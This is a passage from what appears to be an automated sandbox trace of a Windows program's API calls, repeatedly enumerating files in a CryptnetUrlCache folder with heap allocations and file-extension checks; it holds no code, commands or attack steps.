ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x145, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x106) returned 0x32452d8 [0061.235] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0061.235] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x209, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x106) returned 0x32452d8 [0061.235] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0061.235] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.235] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0061.235] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.235] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0061.235] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.235] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.235] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0061.236] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x680, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0061.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.236] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0061.236] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0061.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.236] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0061.236] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0061.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.236] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0061.236] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0061.236] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.237] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0061.237] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x106) returned 0x32452d8 [0061.237] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD") returned="" [0061.237] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x648, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.237] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0061.237] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x22a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x106) returned 0x32452d8 [0061.237] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0061.237] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.237] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0061.237] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd0e4c510, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.237] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x106) returned 0x32452d8 [0061.237] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0061.237] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x67c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.238] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0061.238] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.238] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0061.238] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x6e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.238] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0061.238] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.238] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0061.238] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61210960, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61210960, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.238] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0061.238] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0061.239] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0061.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0061.239] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58394060, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58394060, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0061.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0061.239] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0061.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0061.239] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0061.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x130) returned 0x3201228 [0061.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0061.239] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1cf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0061.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290450 [0061.239] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0061.239] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, 